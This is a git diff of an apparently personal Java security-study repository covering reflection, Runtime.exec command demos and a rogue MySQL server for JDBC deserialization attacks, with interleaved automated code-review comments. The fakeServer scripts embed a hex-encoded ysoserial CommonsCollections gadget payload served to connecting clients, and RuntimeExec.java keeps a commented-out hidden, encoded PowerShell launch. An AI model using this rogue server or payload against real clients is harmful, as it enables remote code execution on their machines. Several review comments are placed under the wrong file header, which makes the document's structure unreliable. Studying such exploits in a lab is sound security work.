+ public int getGender() {
+ return gender;
+ }
+
+ public void setGender(int gender) {
+ this.gender = gender;
+ }
+
+ public int getAge() {
+ return age;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
+}
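Review bot: `public class Baka extends Object{` — the `extends Object` is redundant, and `name` is both a `public` field and wrapped by `getName`/`setName`, so callers can bypass the accessor. The class presumably exists to exercise `getFields`/`getDeclaredFields` and `getMethods`/`getDeclaredMethods` with one member per access level (`public name`, `protected gender`, `private age`, and `hello`/`hug`/`kiss`), so keep the visibilities but say so in a class comment, e.g. `/** Reflection fixture: one field and one method per access level; the visibilities are the point, do not "tidy" them. */`.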
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class"
new file mode 100644
index 0000000..94ba715
Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" differ
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java"
new file mode 100644
index 0000000..ea1cd7c
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java"
@@ -0,0 +1,25 @@
+package com.test.pojo;
+
+import java.io.IOException;
+
+public class Student {
+ private int id;
+
+ public Student() {
+ System.out.println("Student no-arg constructor");
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
+
+ static {
+ System.out.println("Student static block");
+ try {
+ Runtime.getRuntime().exec("notepad");
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
+}
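Review bot: The static initializer wraps its `IOException` in a `RuntimeException`, which the JVM surfaces as `ExceptionInInitializerError` on first use and then `NoClassDefFoundError` on every later reference to `Student` in that JVM; for a fixture meant to show initialization order that deserves a comment on the `static` block, e.g. `// an exception here makes the class unusable for the rest of the JVM`. `private int id` is never read. The compiled `Student.class` is also committed next to the source under `src/main/java/com/test/pojo/` (the same blob id as `ClassLoadStudy/Student.class`); build output does not belong under `src`, and the ClassLoadStudy exercises that need the class file should reference one documented copy instead.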
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
new file mode 100644
index 0000000..3b0170f
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
@@ -0,0 +1,32 @@
+package com.test.study;
+
+import org.apache.commons.io.IOUtils;
+
+import java.io.*;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+
+public class Reflection2Runtime {
+ public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
+ Class aClass = Class.forName("java.lang.Runtime");
+ Constructor declaredConstructor = aClass.getDeclaredConstructor();
+ declaredConstructor.setAccessible(true);
+ Runtime runtime = (Runtime) declaredConstructor.newInstance();
+ runtime.exec("calc");
+
+ InputStream inputStream = Runtime.getRuntime().exec("whoami").getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+
+ inputStream = Runtime.getRuntime().exec("whoami").getInputStream();
+ BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
+ StringBuilder stringBuilder = new StringBuilder();
+ String line;
+ while ((line = bufferedReader.readLine()) != null) {
+ stringBuilder.append(line);
+ }
+ System.out.println(stringBuilder);
+
+
+
+ }
+}
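Review bot: Both `IOUtils.toString(inputStream)` and `new InputStreamReader(inputStream)` decode `whoami`'s output with the platform default charset, and the `BufferedReader` is never closed; pass a charset that matches the command's output (e.g. `new InputStreamReader(inputStream, StandardCharsets.UTF_8)`, which needs `import java.nio.charset.StandardCharsets;` since `java.io.*` does not cover it) and put the reader in a try-with-resources. The `Process` from `runtime.exec("calc")` is discarded, and `stringBuilder.append(line)` drops the line separators, as noted on `runtime.jsp`. `Class aClass` and `Constructor declaredConstructor` are raw types, and `import java.io.*` is a wildcard where four explicit imports would do.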
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" new file mode 100644 index 0000000..be94188 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" 
@@ -0,0 +1,86 @@
+package com.test.study;
+
+import com.test.pojo.Baka;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+
+public class ReflectionMethods {
+ public static void main(String[] args) throws Exception {
+ getField();
+ }
+
+ public static void getMethod() throws Exception {
+ Baka baka = new Baka();
+
+ Class aClass = Class.forName("com.test.pojo.Baka");
+ // 获取所有public方法,包括父类的
+ Method[] methods = aClass.getMethods();
+ for (Method method : methods) {
+ System.out.println(method.getName());
+ }
+
+ System.out.println("================================");
+
+ // 获取自己类的所有方法
+ Method[] declaredMethods = aClass.getDeclaredMethods();
+ for (Method method : declaredMethods) {
+ System.out.println(method.getName());
+ }
+
+ System.out.println("================================");
+
+ Method method = aClass.getDeclaredMethod("kiss", String.class);
+ // 临时设置私有方法可访问
+ method.setAccessible(true);
+ method.invoke(baka, "1diot9");
+
+ Method method1 = aClass.getDeclaredMethod("kiss", String.class, String.class);
+ method1.setAccessible(true);
+ method1.invoke(baka, "baka", "1diot9");
+
+ Method method2 = aClass.getMethod("sit", String.class);
+ // static方法可以不写obj参数
+ method2.invoke(null, "here");
+ }
+
+ public static void getConstructor() throws Exception {
+ Baka baka = new Baka();
+ Class aClass = Class.forName("com.test.pojo.Baka");
+ Constructor[] constructors = aClass.getConstructors();
+ for (Constructor constructor : constructors) {
+ System.out.println(constructor.getName());
+ }
+
+
+ Constructor constructor = aClass.getDeclaredConstructor(String.class, int.class, int.class);
+ constructor.setAccessible(true);
+ constructor.newInstance("1diot9", 0, 1);
+
+ Constructor constructor1 = aClass.getConstructor();
+ constructor1.setAccessible(true);
+ constructor1.newInstance();
+ }
+
+ public static void getField() throws Exception {
+ Baka baka = new 
Baka();
+ Class aClass = Class.forName("com.test.pojo.Baka");
+ Field[] fields = aClass.getDeclaredFields();
+ for (Field field : fields) {
+ System.out.println(field.getName());
+ }
+
+ baka.setName("1diot9");
+
+ Field field = aClass.getDeclaredField("name");
+ field.setAccessible(true);
+ // 反射修改字段
+ field.set(baka, "anything");
+ Object o = field.get(baka);
+ System.out.println(o);
+
+
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java"
new file mode 100644
index 0000000..53d4704
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java"
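Review bot: `Class aClass`, `Constructor[] constructors` and `Constructor constructor` are raw types throughout `getMethod`, `getConstructor` and `getField`; `Class<?>` and `Constructor<?>` make the reflective calls compile without unchecked warnings and change nothing at runtime. In `getConstructor` the local `Baka baka = new Baka();` is never used and can be dropped, and `constructor1.setAccessible(true)` on a constructor obtained from `getConstructor()` (which only returns public constructors) is redundant here. `main` only calls `getField()`, so `getMethod()` and `getConstructor()` never run unless the reader edits `main`; a comment such as `// switch to getMethod() / getConstructor() to run the other two demos` would spare the next reader the surprise.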
@@ -0,0 +1,22 @@
+package com.test.study;
+
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+public class RuntimeExec {
+ public static void main(String[] args) throws IOException {
+ InputStream inputStream = Runtime.getRuntime().exec("whoami && whoami").getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ inputStream = Runtime.getRuntime().exec(new String[]{"whoami","&&","whoami"}).getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ inputStream = Runtime.getRuntime().exec(new String[]{"whoami && whoami"}).getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ inputStream = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c","whoami && whoami"}).getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+// inputStream = Runtime.getRuntime().exec("echo 1 > 1.txt").getInputStream();
+// System.out.println(IOUtils.toString(inputStream));
+// inputStream = Runtime.getRuntime().exec("powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ZQBjAGgAbwAgADEAIAA+ACAAMQAuAHQAeAB0AA==").getInputStream();
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
new file mode 100644
index 0000000..9f437d1
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
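Review bot: Every call reads only `getInputStream()`, so the variants that do not behave like a shell command — the second call hands `whoami` the literal arguments `&&` and `whoami`, the third asks the OS to start a program literally named `whoami && whoami` — either print an empty line or throw an `IOException` out of `main` before the `cmd.exe` variant is reached, and the contrast between the `String` and `String[]` overloads that this class is meant to show is lost in the output. Keep the `Process` and print its stderr as well, e.g. `Process p = Runtime.getRuntime().exec(...);` followed by `System.out.println(IOUtils.toString(p.getErrorStream(), StandardCharsets.UTF_8));`, and catch the `IOException` per call so one failing variant does not stop the remaining demos. The exact failure mode is platform-dependent; the `cmd.exe` call suggests the demo targets Windows. The three commented-out lines at the end of `main` are dead code and should be deleted rather than kept in the source.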
@@ -0,0 +1,19 @@
+package com.test.study;
+
+import com.test.pojo.Baka;
+
+public class Ways2Class {
+ public static void main(String[] args) throws ClassNotFoundException {
+ Baka baka = new Baka();
+
+ Class aClass = baka.getClass();
+
+ Class aClass1 = Class.forName("com.test.pojo.Baka");
+
+ Class aClass2 = Baka.class;
+
+ System.out.println(aClass.equals(aClass1));
+ System.out.println(aClass.equals(aClass2));
+ System.out.println(aClass1.equals(aClass2));
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java"
new file mode 100644
index 0000000..c883171
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java"
@@ -0,0 +1,16 @@
+package com.test.study;
+
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+public class tmp {
+ public static void main(String[] args) throws IOException {
+// Runtime runtime = new Runtime();
+// runtime.exec("calc");
+ Process exec = Runtime.getRuntime().exec("whoami");
+ InputStream inputStream = exec.getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ }
+}
diff --git a/MiddleWare/Tomcat/.gitignore b/MiddleWare/Tomcat/.gitignore
new file mode 100644
index 0000000..5ff6309
--- /dev/null
+++ b/MiddleWare/Tomcat/.gitignore
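Review bot: `Class aClass`, `aClass1` and `aClass2` are raw types; `Class<?>` (or `Class<? extends Baka>` for the `baka.getClass()` result) expresses the same thing without unchecked warnings. `Class` does not override `equals`, so the three comparisons are identity checks, which is precisely what the demo is showing — a comment such as `// all three refer to the same Class object, loaded by the same class loader` would make that explicit for readers, and `==` is the more idiomatic spelling of it. In the tmp.java hunk on the same line, the two commented-out lines at the top of `main` are dead code and belong in a comment explaining why `Runtime` cannot be constructed directly, not as commented-out statements.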
@@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/.gitignore b/MiddleWare/Tomcat/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/MiddleWare/Tomcat/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/MiddleWare/Tomcat/.idea/encodings.xml b/MiddleWare/Tomcat/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/MiddleWare/Tomcat/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/misc.xml b/MiddleWare/Tomcat/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/vcs.xml b/MiddleWare/Tomcat/.idea/vcs.xml similarity index 100% rename from hessian/dubbo/.idea/vcs.xml rename to MiddleWare/Tomcat/.idea/vcs.xml diff --git a/MiddleWare/Tomcat/pom.xml b/MiddleWare/Tomcat/pom.xml new file mode 100644 index 0000000..31f8c91 --- /dev/null +++ b/MiddleWare/Tomcat/pom.xml @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + Tomcat + war + 1.0-SNAPSHOT + Tomcat Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + Tomcat + + 
diff --git a/MiddleWare/Tomcat/src/main/java/com/test/servlet.java b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java new file mode 100644 index 0000000..9f2d3c0 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java @@ -0,0 +1,4 @@ +package com.test; + +public class servlet { +} diff --git a/MiddleWare/Tomcat/src/main/java/com/test/tmp.java b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java new file mode 100644 index 0000000..00a8f3c --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java @@ -0,0 +1,4 @@ +package com.test; + +public class tmp { +} diff --git a/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git a/MiddleWare/Tomcat/src/main/webapp/index.jsp b/MiddleWare/Tomcat/src/main/webapp/index.jsp new file mode 100644 index 0000000..cc264d7 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/index.jsp @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/11/29 + Time: 10:27 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git a/PyCharm/.idea/.gitignore b/PyCharm/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/PyCharm/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/PyCharm/.idea/PyCharm.iml b/PyCharm/.idea/PyCharm.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/PyCharm/.idea/PyCharm.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file 
diff --git a/PyCharm/.idea/inspectionProfiles/Project_Default.xml b/PyCharm/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..528e736 --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,39 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/profiles_settings.xml b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml new file mode 100644 index 0000000..105ce2d --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/misc.xml b/PyCharm/.idea/misc.xml new file mode 100644 index 0000000..db8786c --- /dev/null +++ b/PyCharm/.idea/misc.xml @@ -0,0 +1,7 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/modules.xml b/PyCharm/.idea/modules.xml new file mode 100644 index 0000000..c04746d --- /dev/null +++ b/PyCharm/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/vcs.xml b/PyCharm/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/PyCharm/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py new file mode 100644 index 0000000..477f153 --- /dev/null +++ b/PyCharm/JDBC/Mysql/convert.py @@ -0,0 +1,3 @@ +with open("hex.txt", "r") as f: + data = bytes.fromhex(f.read()) + open("hex.pcap", "wb").write(data) \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py new file mode 100644 index 0000000..7349af8 --- /dev/null +++ b/PyCharm/JDBC/Mysql/fakeServer.py 
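Review bot: In convert.py, `open("hex.pcap", "wb").write(data)` on the last line leaves the output handle to be closed by garbage collection, so if the write raises, or on an interpreter without reference counting, buffered bytes may never be flushed; open it the same way the input is opened, `with open("hex.pcap", "wb") as out:` and `out.write(data)` inside the block. `bytes.fromhex` skips ASCII whitespace (Python 3.7+), so line breaks in the input are tolerated; a one-line comment saying so would stop a reader from "fixing" it with `.replace("\n", "")`.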
@@ -0,0 +1,100 @@ +# coding=utf-8 +import socket +import binascii +import os + +greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400" +response_ok_data="0700000200000002000000" + +def receive_data(conn): + data = conn.recv(1024) + print("[*] Receiveing the package : {}".format(data)) + return str(data).lower() + +def send_data(conn,data): + print("[*] Sending the package : {}".format(data)) + conn.send(binascii.a2b_hex(data)) + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\cc5.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745
472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878' + return payload_content + +# 主要逻辑 +def run(): + + while 1: + conn, addr = sk.accept() + print("Connection come from {}:{}".format(addr[0],addr[1])) + + # 1.先发送第一个 问候报文 + send_data(conn,greeting_data) + + while True: + # 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok + receive_data(conn) + send_data(conn,response_ok_data) + + #其他过程 + data=receive_data(conn) + #查询一些配置信息,其中会发送自己的 版本号 + if "session.auto_increment_increment" in data: + _payload='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' + send_data(conn,_payload) + 
data=receive_data(conn) + elif "show warnings" in data: + _payload = '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' + send_data(conn, _payload) + data = receive_data(conn) + if "set names" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "set character_set_results" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "show session status" in data: + mysql_data = '0100000102' + mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000' + mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000' + # 为什么我加了EOF Packet 就无法正常运行呢?? + # 获取payload + payload_content=get_payload_content() + # 计算payload长度 + payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + # 计算数据包长度 + data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + send_data(conn, mysql_data) + data = receive_data(conn) + if "show warnings" in data: + payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000' + send_data(conn, payload) + break + + +if __name__ == '__main__': + HOST ='127.0.0.1' + PORT = 3307 + + sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + #当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间 + sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sk.bind((HOST, PORT)) + 
sk.listen(1) + + print("start fake mysql server listening on {}:{}".format(HOST,PORT)) + + run() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py new file mode 100644 index 0000000..dc76486 --- /dev/null +++ b/PyCharm/JDBC/Mysql/fakeServerM4x.py 
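Review bot: `run()` accepts a connection, leaves the inner `while True` via `break` after the final `send_data`, and goes straight back to `sk.accept()` without ever calling `conn.close()`, so every client connection is leaked until the process exits; wrap the inner loop in `try:` / `finally: conn.close()`. `run()` also reads `sk` as a module global that only exists inside the `if __name__ == '__main__':` block, so importing this module and calling `run()` fails with `NameError` — pass the listening socket in, `def run(sk):` and `run(sk)`. Under Python 3 `receive_data` returns `str(data).lower()`, i.e. the `b'...'` repr of the bytes rather than decoded text; it happens to work for the substring checks here, but `data.decode('latin-1').lower()` is the honest form and avoids surprising anyone who extends the matching.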
@@ -0,0 +1,90 @@ +import binascii +import os +import socket +import threading + +SHOW_VARIABLES = False + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\CommonsCollections6.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='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' + return payload_content + +def get_data(pdata = b''): + global SHOW_VARIABLES + if b'SHOW VARIABLE' in pdata.upper(): + print("回显变量") + SHOW_VARIABLES = True + return "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" + elif b'SHOW WARNINGS' in pdata.upper(): + print("回显告警") + return "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000005000005fe000002006a000006075761726e696e6704313336365c496e636f727265637420737472696e672076616c75653a20275c7844365c7844305c7842395c7846415c7842315c7845412e2e2e2720666f7220636f6c756d6e20275641524941424c455f56414c55452720617420726f772034383505000007fe00000200" + elif b'SELECT @@session.auto_increment_increment'.upper() in pdata.upper(): + print("回显auto_increment_increment") + return "0100000101380000020364656600000022404073657373696f6e2e6175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a00000000005000003fe0000020002000004013105000005fe00000200" + elif b'SELECT @@session.autocommit'.upper() in pdata.upper(): + print("回显autocommit") + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + elif b'SHOW COLLATION' in pdata.upper(): + print("回显COLLATION") + return "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" + elif b'SET ' in pdata.upper(): + 
